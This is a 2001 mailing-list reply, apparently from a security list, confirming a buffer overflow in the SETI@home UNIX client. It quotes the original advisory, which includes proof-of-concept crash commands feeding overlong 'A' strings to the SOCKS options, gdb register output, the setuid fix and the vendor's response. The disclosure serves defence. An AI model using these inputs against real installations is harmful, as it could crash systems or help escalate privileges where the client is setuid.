Re: Vulnerability in SETI@home

[dotslash () snosoft com]

Verified on OSX
[dhcp065-024-236-177:~/setiathome-3.03.powerpc-apple.1] elguapo% 
./setiathome -socks_passwd `perl -e 'print "A" x 9000'`
Segmentation fault

-KF

On Sunday, December 2, 2001, at 03:15 PM, joetesta () hushmail com wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI@home
>
>
>
>     Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project 
> that
> allows ordinary citizens participate in the search for extraterrestrial
> intelligence using their computer's idle time.  A buffer overflow exists
> in the UNIX client software.
>
> NOTE:  this vulnerability is NOT exploitable in the default 
> installation.
>
>
>
>     Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow.  Example:
>
>
> # ./setiathome -version
> SETI@home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root@seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and 
> you are
> welcome to change it and/or distribute copies of it under certain 
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for 
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e 
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax            0x0      0
> ecx            0x40404040       1077952576
> edx            0x41414141       1094795585
> ebx            0xfefefeff       -16843009
> esp            0x7fffe664       0x7fffe664
> ebp            0x7fffe6bc       0x7fffe6bc
> esi            0x7ffffe28       2147483176
> edi            0x807bffd        134725629
> eip            0x2ab4d409       0x2ab4d409
> eflags         0x10246  66118
> cs             0x23     35
> ss             0x2b     43
> ds             0x2b     43
> es             0x2b     43
> fs             0x0      0
> gs             0x0      0
> fctrl          0x37f    895
> fstat          0x0      0
> ftag           0xffff   65535
> fiseg          0x0      0
> fioff          0x0      0
> foseg          0x0      0
> fooff          0x0      0
> fop            0x0      0
>
>
>
>     Solution
>
> The SETI@home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome' 
> account --
> remove it immediately.
>
>
>
>     Vendor Status
>
> The project directory, Dr. Dave P. Anderson, was contacted via
> <davea () ssl berkeley edu> on Monday, Nov 5th.  He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
>     - Joe Testa
>
> e-mail:   joetesta () hushmail com
> web page: http://hogs.rit.edu/~joet/
> AIM:      LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----